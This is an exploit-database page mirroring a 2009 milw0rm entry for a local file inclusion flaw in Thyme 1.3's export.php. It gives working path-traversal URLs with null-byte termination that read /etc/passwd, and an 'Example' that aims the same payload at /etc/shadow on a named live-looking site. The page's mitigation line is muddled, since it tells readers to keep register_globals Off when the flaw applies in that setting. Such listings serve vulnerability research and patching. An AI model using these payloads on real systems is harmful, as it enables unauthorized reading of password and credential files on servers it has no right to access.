header-logo
Suggest Exploit
vendor:
Thyme
by:
cheverok
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Thyme
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:exrovert_software:thyme:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Theme Local File Inclusion / (Register_globals: off)

If register_globals is set to Off, an attacker can exploit a Local File Inclusion vulnerability in Thyme 1.3 by sending a specially crafted HTTP request to the export.php script. This will allow the attacker to read arbitrary files on the server.

Mitigation:

Ensure that register_globals is set to Off and that all user-supplied input is validated and filtered.
Source

Exploit-DB raw data:

[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Theme Local File Inclusion / (Register_globals: off) |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Version: <= 1.3 |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Dork: Thyme 1. © 2006 eXtrovert Software LLC. All rights reserved |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Founded by: cheverok[at]gmail.com |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]

--------------------------------------------------------------------------------------
  Intro:

See info

  http://host/patch/phpinfo.php
   
   
if register_globals Off, then

---------------------------------------------------------------------------------------
  Exploit:
   
  http://host/patch/modules/sync/export.php?export_to=../../../../../../../../../../../etc/passwd%00


---------------------------------------------------------------------------------------
  Example:


  http://www.cbpool.org/thyme/modules/sync/export.php?export_to=../../../../../../../../../../../etc/shadow%00

----------------------------------------------------------------------------------------
(c) cheverok, 10.2.2009 greetz to antichat  

# milw0rm.com [2009-02-10]

Navigation

Suggest Exploit

Services By CQR